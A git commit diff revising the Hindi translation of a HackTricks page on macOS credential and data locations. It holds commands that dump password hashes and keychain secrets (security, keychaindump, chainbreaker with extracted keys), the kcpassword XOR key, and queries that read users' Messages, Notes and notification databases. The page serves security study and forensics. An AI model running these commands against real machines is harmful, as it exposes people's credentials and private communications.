mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
This commit is contained in:
parent
4d35431c69
commit
2e33d0c048
1 changed files with 69 additions and 69 deletions
|
@ -1,26 +1,26 @@
|
|||
# macOS संवेदनशील स्थान और दिलचस्प डेमन्स
|
||||
# macOS संवेदनशील स्थान और दिलचस्प डेमन
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
सीखें और AWS हैकिंग का अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और GCP हैकिंग का अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
* [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को** **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
|
||||
* [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* **हमारे** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या **हमें** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो करें।**
|
||||
* हैकिंग ट्रिक्स साझा करें और [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) गिटहब रिपोजिटरी में PR सबमिट करें।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## पासवर्ड
|
||||
|
||||
### छाया पासवर्ड
|
||||
### शैडो पासवर्ड
|
||||
|
||||
छाया पासवर्ड प्रयोक्ता के विन्यास के साथ संग्रहीत होता है पीलिस्ट में जो स्थित है **`/var/db/dslocal/nodes/Default/users/`** में।\
|
||||
निम्नलिखित वनलाइनर का उपयोग किया जा सकता है **सभी उपयोक्ताओं के बारे में सभी जानकारी** (हैश जानकारी सहित) डंप करने के लिए:
|
||||
शैडो पासवर्ड उपयोगकर्ता की कॉन्फ़िगरेशन के साथ **`/var/db/dslocal/nodes/Default/users/`** में स्थित plist में संग्रहीत होता है।\
|
||||
निम्नलिखित एकल पंक्ति का उपयोग **उपयोगकर्ताओं के बारे में सभी जानकारी** (हैश जानकारी सहित) को डंप करने के लिए किया जा सकता है:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
@ -28,9 +28,9 @@ for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
[**इस तरह के स्क्रिप्ट**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) या [**यह एक**](https://github.com/octomagon/davegrohl.git) को **हैश** को **हैशकैट** **स्वरूप** में परिवर्तित करने के लिए उपयोग किया जा सकता है।
|
||||
[**इस तरह के स्क्रिप्ट**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) या [**यह वाला**](https://github.com/octomagon/davegrohl.git) हैश को **hashcat** **फॉर्मेट** में बदलने के लिए उपयोग किया जा सकता है।
|
||||
|
||||
एक वैकल्पिक वन-लाइनर जो सभी गैर-सेवा खातों के क्रेडेंशियल को हैशकैट स्वरूप में डंप करेगा `-m 7100` (macOS PBKDF2-SHA512):
|
||||
एक वैकल्पिक वन-लाइनर जो hashcat फॉर्मेट `-m 7100` (macOS PBKDF2-SHA512) में सभी गैर-सेवा खातों के क्रेडेंशियल्स को डंप करेगा:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
@ -38,12 +38,12 @@ sudo bash -c 'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
### कीचेन डंप
|
||||
### Keychain Dump
|
||||
|
||||
ध्यान दें कि सुरक्षा बाइनरी का उपयोग करते समय **पासवर्ड डिक्रिप्ट करने के लिए डंप** करने पर कई प्रॉम्प्ट उपयोगकर्ता से इस ऑपरेशन की अनुमति देने के लिए पूछेंगे।
|
||||
ध्यान दें कि सुरक्षा बाइनरी का उपयोग करके **डिक्रिप्ट किए गए पासवर्ड को डंप करने** पर, कई प्रॉम्प्ट उपयोगकर्ता से इस ऑपरेशन की अनुमति देने के लिए पूछेंगे।
|
||||
```bash
|
||||
#security
|
||||
secuirty dump-trust-settings [-s] [-d] #List certificates
|
||||
security dump-trust-settings [-s] [-d] #List certificates
|
||||
security list-keychains #List keychain dbs
|
||||
security list-smartcards #List smartcards
|
||||
security dump-keychain | grep -A 5 "keychain" | grep -v "version" #List keychains entries
|
||||
|
@ -52,44 +52,42 @@ security dump-keychain -d #Dump all the info, included secrets (the user will be
|
|||
### [Keychaindump](https://github.com/juuso/keychaindump)
|
||||
|
||||
{% hint style="danger" %}
|
||||
इस टिप्पणी के आधार पर [juuso/keychaindump#10 (comment)](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) यह लगता है कि ये उपकरण Big Sur में अब काम नहीं कर रहे हैं।
|
||||
इस टिप्पणी के आधार पर [juuso/keychaindump#10 (comment)](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) ऐसा लगता है कि ये उपकरण अब Big Sur में काम नहीं कर रहे हैं।
|
||||
{% endhint %}
|
||||
|
||||
### Keychaindump Overview
|
||||
### Keychaindump का अवलोकन
|
||||
|
||||
एक उपकरण जिसका नाम **keychaindump** है, इसका विकास macOS की keychains से पासवर्ड निकालने के लिए किया गया है, लेकिन नए macOS संस्करणों जैसे Big Sur पर इसकी कुछ सीमाएँ हैं, जैसा कि [चर्चा](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) में इंगित किया गया है। **keychaindump** का उपयोग अटैकर को **root** तक पहुंचने और वर्चस्व को उन्नत करने की आवश्यकता है। यह उपकरण उस तथ्य का शोषण करता है कि keychain डिफ़ॉल्ट रूप से उपयोक्ता लॉगिन के बाद अनलॉक होता है ताकि अनुकूलता के लिए अनुप्रयोग उसे बार-बार उपयोगकर्ता का पासवर्ड नहीं मांगें। हालांकि, यदि एक उपयोक्ता हर उपयोग के बाद अपनी keychain को लॉक करने का विकल्प चुनता है, तो **keychaindump** अप्रभावी हो जाता है।
|
||||
**keychaindump** नामक एक उपकरण macOS की कीचेन से पासवर्ड निकालने के लिए विकसित किया गया है, लेकिन यह Big Sur जैसे नए macOS संस्करणों पर सीमाओं का सामना करता है, जैसा कि एक [चर्चा](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) में बताया गया है। **keychaindump** का उपयोग करने के लिए हमलावर को **root** तक पहुंच प्राप्त करनी और विशेषाधिकार बढ़ाने की आवश्यकता होती है। यह उपकरण इस तथ्य का लाभ उठाता है कि कीचेन उपयोगकर्ता लॉगिन पर डिफ़ॉल्ट रूप से अनलॉक होता है, जिससे अनुप्रयोगों को बार-बार उपयोगकर्ता का पासवर्ड मांगे बिना इसे एक्सेस करने की अनुमति मिलती है। हालाँकि, यदि कोई उपयोगकर्ता प्रत्येक उपयोग के बाद अपनी कीचेन को लॉक करने का विकल्प चुनता है, तो **keychaindump** अप्रभावी हो जाता है।
|
||||
|
||||
**Keychaindump** एक विशिष्ट प्रक्रिया को लक्ष्य बनाकर काम करता है जिसे **securityd** कहा जाता है, जिसे Apple ने प्रमाणीकरण और यांत्रिक आपरेशनों के लिए डेमन के रूप में वर्णित किया है, जो keychain तक पहुंचने के लिए महत्वपूर्ण है। निकालने की प्रक्रिया में उपयोगकर्ता के लॉगिन पासवर्ड से निकली गई एक **मास्टर की** की पहचान करना महत्वपूर्ण है। यह कुंजी keychain फ़ाइल को पढ़ने के लिए आवश्यक है। **keychaindump** **securityd** की मेमोरी हीप को `vmmap` कमांड का उपयोग करके लक्ष्य बनाता है, `MALLOC_TINY` के रूप में झंझट के क्षेत्रों में संभावित कुंजियों की खोज करता है। इन मेमोरी स्थानों की जांच के लिए निम्नलिखित कमांड का उपयोग किया जाता है:
|
||||
**Keychaindump** एक विशिष्ट प्रक्रिया **securityd** को लक्षित करके काम करता है, जिसे Apple द्वारा प्राधिकरण और क्रिप्टोग्राफिक संचालन के लिए एक डेमन के रूप में वर्णित किया गया है, जो कीचेन तक पहुंच के लिए महत्वपूर्ण है। निष्कर्षण प्रक्रिया में उपयोगकर्ता के लॉगिन पासवर्ड से निकाली गई **Master Key** की पहचान करना शामिल है। यह कुंजी कीचेन फ़ाइल को पढ़ने के लिए आवश्यक है। **Master Key** को खोजने के लिए, **keychaindump** `vmmap` कमांड का उपयोग करके **securityd** की मेमोरी हीप को स्कैन करता है, संभावित कुंजियों को `MALLOC_TINY` के रूप में चिह्नित क्षेत्रों के भीतर देखता है। इन मेमोरी स्थानों का निरीक्षण करने के लिए निम्नलिखित कमांड का उपयोग किया जाता है:
|
||||
```bash
|
||||
sudo vmmap <securityd PID> | grep MALLOC_TINY
|
||||
```
|
||||
पॉटेंशियल मास्टर की को पहचानने के बाद, **keychaindump** विशिष्ट पैटर्न (`0x0000000000000018`) के लिए हीप्स में खोज करता है जो मास्टर की के लिए उम्मीदवार को दर्शाता है। इस की का उपयोग करने के लिए और चरणों की आवश्यकता होती है, जैसा **keychaindump** के स्रोत कोड में विस्तार से वर्णित है। इस क्षेत्र पर ध्यान केंद्रित विश्लेषकों को ध्यान देना चाहिए कि कीचेन को डिक्रिप्ट करने के लिए महत्वपूर्ण डेटा **securityd** प्रक्रिया की मेमोरी में संग्रहित है। **keychaindump** चलाने के लिए एक उदाहरण कमांड है:
|
||||
बाद में संभावित मास्टर कुंजियों की पहचान करने के बाद, **keychaindump** एक विशिष्ट पैटर्न (`0x0000000000000018`) के लिए ढेरों में खोज करता है जो मास्टर कुंजी के लिए एक उम्मीदवार को इंगित करता है। इस कुंजी का उपयोग करने के लिए आगे के कदम, जिसमें डिओबफस्केशन शामिल है, आवश्यक हैं, जैसा कि **keychaindump** के स्रोत कोड में वर्णित है। इस क्षेत्र पर ध्यान केंद्रित करने वाले विश्लेषकों को यह ध्यान रखना चाहिए कि कुंजीचेन को डिक्रिप्ट करने के लिए महत्वपूर्ण डेटा **securityd** प्रक्रिया की मेमोरी में संग्रहीत होता है। **keychaindump** चलाने के लिए एक उदाहरण कमांड है:
|
||||
```bash
|
||||
sudo ./keychaindump
|
||||
```
|
||||
### चेनब्रेकर
|
||||
### chainbreaker
|
||||
|
||||
[**चेनब्रेकर**](https://github.com/n0fate/chainbreaker) का उपयोग एक OSX कीचेन से नियंत्रित ढंग से निम्नलिखित प्रकार की जानकारी निकालने के लिए किया जा सकता है:
|
||||
[**Chainbreaker**](https://github.com/n0fate/chainbreaker) का उपयोग OSX कीचेन से फोरेंसिक रूप से सही तरीके से निम्नलिखित प्रकार की जानकारी निकालने के लिए किया जा सकता है:
|
||||
|
||||
* हैश वाला Keychain पासवर्ड, [hashcat](https://hashcat.net/hashcat/) या [John the Ripper](https://www.openwall.com/john/) के साथ क्रैकिंग के लिए उपयुक्त
|
||||
* हैश किया गया कीचेन पासवर्ड, [hashcat](https://hashcat.net/hashcat/) या [John the Ripper](https://www.openwall.com/john/) के साथ क्रैक करने के लिए उपयुक्त
|
||||
* इंटरनेट पासवर्ड
|
||||
* सामान्य पासवर्ड
|
||||
* निजी कुंजी
|
||||
* सार्वजनिक कुंजी
|
||||
* X509 प्रमाणपत्र
|
||||
* सुरक्षित नोट्स
|
||||
* एप्पलशेयर पासवर्ड
|
||||
* Appleshare पासवर्ड
|
||||
|
||||
कीचेन अनलॉक पासवर्ड, [volafox](https://github.com/n0fate/volafox) या [volatility](https://github.com/volatilityfoundation/volatility) का उपयोग करके प्राप्त मास्टर कुंजी, या सिस्टमकी जैसा अनलॉक फ़ाइल के साथ, चेनब्रेकर भी सादा पासवर्ड प्रदान करेगा।
|
||||
कीचेन अनलॉक पासवर्ड, [volafox](https://github.com/n0fate/volafox) या [volatility](https://github.com/volatilityfoundation/volatility) का उपयोग करके प्राप्त मास्टर कुंजी, या SystemKey जैसे अनलॉक फ़ाइल के बिना, Chainbreaker सभी अन्य उपलब्ध जानकारी प्रदर्शित करेगा।
|
||||
|
||||
कीचेन को अनलॉक करने के इन तरीकों में से किसी एक के बिना, चेनब्रेकर सभी अन्य उपलब्ध जानकारी प्रदर्शित करेगा।
|
||||
|
||||
#### **कीचेन कुंजियों को डंप करें**
|
||||
#### **Dump keychain keys**
|
||||
```bash
|
||||
#Dump all keys of the keychain (without the passwords)
|
||||
python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain
|
||||
```
|
||||
#### **सिस्टमकी के साथ कीचेन कुंजी (साथ में पासवर्ड) डंप करें**
|
||||
#### **सिस्टमकी के साथ कीचेन कुंजी (पासवर्ड के साथ) डंप करें**
|
||||
```bash
|
||||
# First, get the keychain decryption key
|
||||
# To get this decryption key you need to be root and SIP must be disabled
|
||||
|
@ -97,7 +95,7 @@ hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo
|
|||
## Use the previous key to decrypt the passwords
|
||||
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
|
||||
```
|
||||
#### **हैश को क्रैक करके कीचेन कुंजी (साथ में पासवर्ड) डंप करें**
|
||||
#### **कीचेन कुंजी (पासवर्ड के साथ) डंप करना हैश को क्रैक करना**
|
||||
```bash
|
||||
# Get the keychain hash
|
||||
python2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain
|
||||
|
@ -106,9 +104,9 @@ hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt
|
|||
# Use the key to decrypt the passwords
|
||||
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
|
||||
```
|
||||
#### **मेमोरी डंप के साथ कीचेन कुंजी (साथ पासवर्ड) डंप करें**
|
||||
#### **कीचेन कुंजियों (पासवर्ड के साथ) को मेमोरी डंप के साथ डंप करें**
|
||||
|
||||
[इन चरणों का पालन करें](../#dumping-memory-with-osxpmem) एक **मेमोरी डंप** करने के लिए
|
||||
[इन चरणों का पालन करें](../#dumping-memory-with-osxpmem) **मेमोरी डंप** करने के लिए
|
||||
```bash
|
||||
#Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords
|
||||
# Unformtunately volafox isn't working with the latest versions of MacOS
|
||||
|
@ -117,23 +115,23 @@ python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump
|
|||
#Try to extract the passwords using the extracted keychain passwords
|
||||
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
|
||||
```
|
||||
#### **उपयोगकर्ता के पासवर्ड का उपयोग करके कीचेन कुंजी (साथ में पासवर्ड) डंप करें**
|
||||
#### **उपयोगकर्ता के पासवर्ड का उपयोग करके कीचेन कुंजी (पासवर्ड के साथ) डंप करें**
|
||||
|
||||
यदि आप उपयोगकर्ता का पासवर्ड जानते हैं तो आप इसका उपयोग करके **उपयोगकर्ता के कीचेन कुंजी को डंप और डिक्रिप्ट** कर सकते हैं।
|
||||
यदि आप उपयोगकर्ता का पासवर्ड जानते हैं, तो आप इसका उपयोग **उपयोगकर्ता के स्वामित्व वाले कीचेन को डंप और डिक्रिप्ट करने के लिए** कर सकते हैं।
|
||||
```bash
|
||||
#Prompt to ask for the password
|
||||
python2.7 chainbreaker.py --dump-all --password-prompt /Users/<username>/Library/Keychains/login.keychain-db
|
||||
```
|
||||
### kcpassword
|
||||
|
||||
**kcpassword** फ़ाइल एक फ़ाइल है जो **उपयोगकर्ता का लॉगिन पासवर्ड** रखती है, लेकिन केवल तभी जब सिस्टम के मालिक ने **स्वचालित लॉगिन** को सक्षम किया है। इसलिए, उपयोगकर्ता को पासवर्ड के बिना स्वचालित रूप से लॉगिन किया जाएगा (जो बहुत ही सुरक्षित नहीं है)।
|
||||
**kcpassword** फ़ाइल एक फ़ाइल है जो **उपयोगकर्ता का लॉगिन पासवर्ड** रखती है, लेकिन केवल तभी जब सिस्टम के मालिक ने **स्वचालित लॉगिन** सक्षम किया हो। इसलिए, उपयोगकर्ता बिना पासवर्ड पूछे स्वचालित रूप से लॉगिन हो जाएगा (जो बहुत सुरक्षित नहीं है)।
|
||||
|
||||
पासवर्ड **`/etc/kcpassword`** फ़ाइल में **`0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F`** कुंजी के साथ xored के साथ संग्रहीत है। यदि उपयोगकर्ता का पासवर्ड कुंजी से लंबा है, तो कुंजी का पुनः उपयोग किया जाएगा।\
|
||||
इससे पासवर्ड को पुनः प्राप्त करना बहुत ही आसान बना देता है, उदाहरण के लिए [**इस**](https://gist.github.com/opshope/32f65875d45215c3677d) जैसे स्क्रिप्ट का उपयोग करके।
|
||||
पासवर्ड फ़ाइल **`/etc/kcpassword`** में **`0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F`** कुंजी के साथ XOR किया गया है। यदि उपयोगकर्ता का पासवर्ड कुंजी से लंबा है, तो कुंजी का पुन: उपयोग किया जाएगा।\
|
||||
यह पासवर्ड को पुनर्प्राप्त करना काफी आसान बनाता है, उदाहरण के लिए [**इस स्क्रिप्ट**](https://gist.github.com/opshope/32f65875d45215c3677d) का उपयोग करके।
|
||||
|
||||
## डेटाबेस में दिलचस्प जानकारी
|
||||
## Interesting Information in Databases
|
||||
|
||||
### संदेश
|
||||
### Messages
|
||||
```bash
|
||||
sqlite3 $HOME/Library/Messages/chat.db .tables
|
||||
sqlite3 $HOME/Library/Messages/chat.db 'select * from message'
|
||||
|
@ -141,20 +139,22 @@ sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment'
|
|||
sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages'
|
||||
sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'
|
||||
```
|
||||
### सूचनाएं
|
||||
### Notifications
|
||||
|
||||
आप `$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/` में सूचनाएं डेटा पा सकते हैं।
|
||||
आप Notifications डेटा को `$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/` में पा सकते हैं।
|
||||
|
||||
अधिकांश दिलचस्प जानकारी **ब्लॉब** में होगी। इसलिए आपको उस सामग्री को **निकालना** होगा और **मानव** **पठनीय** में **परिवर्तित** करना होगा या **`strings`** का उपयोग करना होगा। इस तक पहुंचने के लिए आप यह कर सकते हैं:
|
||||
सबसे दिलचस्प जानकारी **blob** में होगी। इसलिए आपको उस सामग्री को **extract** करना होगा और **human** **readable** में **transform** करना होगा या **`strings`** का उपयोग करना होगा। इसे एक्सेस करने के लिए आप कर सकते हैं:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
|
||||
strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### नोट
|
||||
### नोट्स
|
||||
|
||||
उपयोगकर्ताओं के **नोट** यहाँ मिल सकते हैं `~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite`
|
||||
उपयोगकर्ताओं के **नोट्स** `~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite` में पाए जा सकते हैं
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
@ -167,21 +167,21 @@ for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.s
|
|||
|
||||
## Preferences
|
||||
|
||||
macOS ऐप्स में preferences **`$HOME/Library/Preferences`** में स्थित होते हैं और iOS में वे `/var/mobile/Containers/Data/Application/<UUID>/Library/Preferences` में होते हैं।
|
||||
macOS ऐप्स की प्राथमिकताएँ **`$HOME/Library/Preferences`** में स्थित होती हैं और iOS में ये `/var/mobile/Containers/Data/Application/<UUID>/Library/Preferences` में होती हैं। 
|
||||
|
||||
macOS में cli टूल **`defaults`** का उपयोग **Preferences फ़ाइल को संशोधित करने** के लिए किया जा सकता है।
|
||||
macOS में CLI टूल **`defaults`** का उपयोग **प्राथमिकताएँ फ़ाइल को संशोधित करने** के लिए किया जा सकता है।
|
||||
|
||||
**`/usr/sbin/cfprefsd`** XPC सेवाएं `com.apple.cfprefsd.daemon` और `com.apple.cfprefsd.agent` का दावा करता है और preferences को संशोधित करने जैसे कार्रवाई करने के लिए कॉल किया जा सकता है।
|
||||
**`/usr/sbin/cfprefsd`** XPC सेवाओं `com.apple.cfprefsd.daemon` और `com.apple.cfprefsd.agent` का दावा करता है और प्राथमिकताओं को संशोधित करने जैसी क्रियाएँ करने के लिए इसे कॉल किया जा सकता है।
|
||||
|
||||
## System Notifications
|
||||
|
||||
### Darwin Notifications
|
||||
|
||||
Notifications के लिए मुख्य डेमन **`/usr/sbin/notifyd`** है। Notifications प्राप्त करने के लिए, clients को `com.apple.system.notification_center` Mach port के माध्यम से रजिस्टर करना होता है (उन्हें `sudo lsmp -p <pid notifyd>` के साथ जांचें)। डेमन को फ़ाइल `/etc/notify.conf` के साथ कॉन्फ़िगर किया जा सकता है।
|
||||
सूचनाओं के लिए मुख्य डेमन **`/usr/sbin/notifyd`** है। सूचनाएँ प्राप्त करने के लिए, क्लाइंट को `com.apple.system.notification_center` Mach पोर्ट के माध्यम से पंजीकरण कराना होगा (इन्हें `sudo lsmp -p <pid notifyd>` के साथ जांचें)। डेमन को फ़ाइल `/etc/notify.conf` के साथ कॉन्फ़िगर किया जा सकता है।
|
||||
|
||||
Notifications के लिए उपयोग किए जाने वाले नाम अद्वितीय प्रतिलिपि DNS नोटेशन होते हैं और जब उनमें से किसी एक को भेजा जाता है, तो उन client(s) को जो इसे संभालने का संकेत देते हैं, वह इसे प्राप्त करेंगे।
|
||||
सूचनाओं के लिए उपयोग किए जाने वाले नाम अद्वितीय रिवर्स DNS नोटेशन हैं और जब इनमें से किसी को सूचना भेजी जाती है, तो वे क्लाइंट जो इसे संभालने के लिए संकेतित करते हैं, इसे प्राप्त करेंगे।
|
||||
|
||||
वर्तमान स्थिति को डंप करना संभव है (और सभी नाम देखना) notifyd प्रक्रिया को सिग्नल SIGUSR2 भेजकर और उत्पन्न फ़ाइल पढ़कर: `/var/run/notifyd_<pid>.status`:
|
||||
वर्तमान स्थिति को डंप करना संभव है (और सभी नामों को देखना) notifyd प्रक्रिया को SIGUSR2 सिग्नल भेजकर और उत्पन्न फ़ाइल को पढ़कर: `/var/run/notifyd_<pid>.status`:
|
||||
```bash
|
||||
ps -ef | grep -i notifyd
|
||||
0 376 1 0 15Mar24 ?? 27:40.97 /usr/sbin/notifyd
|
||||
|
@ -197,44 +197,44 @@ common: com.apple.CFPreferences._domainsChangedExternally
|
|||
common: com.apple.security.octagon.joined-with-bottle
|
||||
[...]
|
||||
```
|
||||
### वितरित सूचना केंद्र
|
||||
### Distributed Notification Center
|
||||
|
||||
**वितरित सूचना केंद्र** जिसका मुख्य बाइनरी है **`/usr/sbin/distnoted`**, एक और तरीका है सूचनाएं भेजने का। इसमें कुछ XPC सेवाएं उजागर की गई हैं और यह कुछ जांच कार्रवाई करता है ताकि ग्राहकों की पुष्टि की जा सके।
|
||||
**Distributed Notification Center** जिसका मुख्य बाइनरी **`/usr/sbin/distnoted`** है, सूचनाएँ भेजने का एक और तरीका है। यह कुछ XPC सेवाओं को उजागर करता है और यह क्लाइंट्स को सत्यापित करने के लिए कुछ जांच करता है।
|
||||
|
||||
### एप्पल पुश सूचनाएं (APN)
|
||||
### Apple Push Notifications (APN)
|
||||
|
||||
इस मामले में, एप्लिकेशन **विषयों** के लिए पंजीकरण कर सकती हैं। ग्राहक एप्पल के सर्वरों से संपर्क करके एक टोकन उत्पन्न करेगा **`apsd`** के माध्यम से।\
|
||||
फिर, प्रदाताओं ने भी एक टोकन उत्पन्न किया होगा और वे एप्पल के सर्वरों से संपर्क करने में सक्षम होंगे ताकि संदेश ग्राहकों को भेज सकें। ये संदेश स्थानीय रूप से **`apsd`** द्वारा प्राप्त किए जाएंगे जो इसका अग्रिम सूचना को उस एप्लिकेशन को पहुंचाएगा जो इसका इंतजार कर रहा होगा।
|
||||
इस मामले में, अनुप्रयोग **topics** के लिए पंजीकरण कर सकते हैं। क्लाइंट **`apsd`** के माध्यम से Apple के सर्वरों से संपर्क करके एक टोकन उत्पन्न करेगा।\
|
||||
फिर, प्रदाता भी एक टोकन उत्पन्न करेंगे और Apple के सर्वरों से जुड़कर क्लाइंट्स को संदेश भेज सकेंगे। ये संदेश स्थानीय रूप से **`apsd`** द्वारा प्राप्त किए जाएंगे जो इसे प्रतीक्षा कर रहे अनुप्रयोग को सूचना भेजेगा।
|
||||
|
||||
पसंद स्थान `/Library/Preferences/com.apple.apsd.plist` में स्थित है।
|
||||
प्राथमिकताएँ `/Library/Preferences/com.apple.apsd.plist` में स्थित हैं।
|
||||
|
||||
मैकओएस में संदेशों का स्थानीय डेटाबेस है `/Library/Application\ Support/ApplePushService/aps.db` और आईओएस में `/var/mobile/Library/ApplePushService` में है। इसमें 3 तालिकाएं हैं: `incoming_messages`, `outgoing_messages` और `channel`।
|
||||
macOS में संदेशों का एक स्थानीय डेटाबेस `/Library/Application\ Support/ApplePushService/aps.db` में और iOS में `/var/mobile/Library/ApplePushService` में स्थित है। इसमें 3 तालिकाएँ हैं: `incoming_messages`, `outgoing_messages` और `channel`।
|
||||
```bash
|
||||
sudo sqlite3 /Library/Application\ Support/ApplePushService/aps.db
|
||||
```
|
||||
डेमन और कनेक्शन के बारे में जानकारी प्राप्त करना भी संभव है:
|
||||
यहां तक कि डेमन और कनेक्शनों के बारे में जानकारी प्राप्त करना भी संभव है:
|
||||
```bash
|
||||
/System/Library/PrivateFrameworks/ApplePushService.framework/apsctl status
|
||||
```
|
||||
## उपयोगकर्ता सूचनाएँ
|
||||
## User Notifications
|
||||
|
||||
ये सूचनाएँ हैं जो उपयोगकर्ता को स्क्रीन पर दिखानी चाहिए:
|
||||
ये सूचनाएँ हैं जो उपयोगकर्ता को स्क्रीन पर देखनी चाहिए:
|
||||
|
||||
* **`CFUserNotification`**: यह API एक संदेश के साथ स्क्रीन पर एक पॉप-अप दिखाने का एक तरीका प्रदान करती है।
|
||||
* **बुलेटिन बोर्ड**: यह iOS में एक बैनर दिखाता है जो गायब हो जाता है और सूचना केंद्र में संग्रहीत किया जाएगा।
|
||||
* **`NSUserNotificationCenter`**: यह MacOS में iOS बुलेटिन बोर्ड है। सूचनाएँ के डेटाबेस को `/var/folders/<user temp>/0/com.apple.notificationcenter/db2/db` में स्थित किया गया है।
|
||||
* **`CFUserNotification`**: ये API स्क्रीन पर एक संदेश के साथ पॉप-अप दिखाने का एक तरीका प्रदान करती है।
|
||||
* **The Bulletin Board**: यह iOS में एक बैनर दिखाता है जो गायब हो जाता है और सूचना केंद्र में संग्रहीत होता है।
|
||||
* **`NSUserNotificationCenter`**: यह MacOS में iOS का बुलेटिन बोर्ड है। सूचनाओं के साथ डेटाबेस `/var/folders/<user temp>/0/com.apple.notificationcenter/db2/db` में स्थित है।
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
